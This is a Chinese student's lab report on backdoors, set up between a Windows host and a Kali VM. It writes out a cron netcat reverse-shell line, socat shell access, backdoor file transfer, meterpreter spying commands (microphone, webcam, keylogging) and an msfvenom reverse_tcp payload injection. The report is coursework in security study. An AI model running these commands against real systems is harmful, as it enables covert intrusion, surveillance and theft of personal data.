1.实验内容
1.实践目标
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
2.实验要求
-
掌握后门原理及免杀技术
-
回答问题
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:下载软件时,软件被开发者有意或无意留下了后门,则主机被引入了后门
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:windows中:后门程序作为.exe文件或者快捷方式,被用户点击后启动,或者安装为服务后,进行自启动; Linux中:后门程序被设置在cron等服务中实现自启动
(3)Meterpreter有哪些给你映像深刻的功能?
答:可以开启摄像头、录音、截屏、记录键盘输入字符
(4)如何发现自己有系统有没有被安装后门?
答:杀毒软件扫描;任务管理器查看占用内存和cpu资源的程序。
2.实验过程
任务一:使用netcat获取主机操作Shell,cron启动某项任务
Windows主机ip地址为192.168.3.18,Kali虚拟机ip地址为192.168.50.129
在kali虚拟机执行指令crotab -e,在文件的末尾添加* * * * * /bin/netcat 192.168.56.1 8888 -e /bin/sh
输入ncat.exe -l -p 8888监听8888端口
任务二:使用socat获取主机操作Shell, 任务计划启动
把cmd.exe绑定到端口5055,在虚拟机中输入指令socat - tcp:192.168.3.18:5055,获取主机操作shell
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在kali中输入指令得到后门文件20192417.exe,windows执行ncat.exe -l 7777 > 20192417.exe指令接收后门程序,kali虚拟机中执行nc 192.168.3.18 7777 < 20192417.exe发送后门程,在windows主机可以发现后门程序
在kali虚拟机输入msfconsole指令进入msf控制台,设置ip地址与端口号等,最后输入exploit开始监听,运行windows后门程序,在kali上获取主机shell
任务四 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
在任务三基础上,执行以下指令
record_mic:获取音频
webcam_snap:控制主机摄像头拍照
screenshot:控制主机截屏
keyscan_start:记录主机键盘输入的过程
keyscan_dump:读取键盘输入的记录(有序)
getsystem指令尝试提权操作,提权失败
任务五 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
kali虚拟机上执行 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.50.129 LPORT=3333 -x /root/pwn20192412 -f elf >20192417pwn
在msf控制台执行exploit进行监听,开启另外一个终端输入./20192417pwn指令,可以发现在msf控制台上成功获取了linux的shell
3.问题及解决方案
- 问题1:发送后门程序后发现虽然windows有这个程序但是文件大小为0kB
- 问题1解决方案:防火墙没关,阻止了后门程序的发送
- 问题2:任务五监听没有反应
- 问题2解决方案:发现自己无意间生成了两个20192417pwn文件,而运行了另外一个20192417pwn文件,与监听的那个路径不一样所以监听无反应
4.学习感悟、思考等
在本次实验中我初步了解了后门程序的简单使用,对msf控制台一些功能的了解。在网络世界中后门程序可以起到非常大的作用,而msf控制台利用后门程序可以神不知鬼不觉地获取你的摄像头、麦克风等权限进行个人信息的盗取。这次实验给我带来了后门与安全的最直接感受,而防火墙等杀毒软件的效果是显而易见的。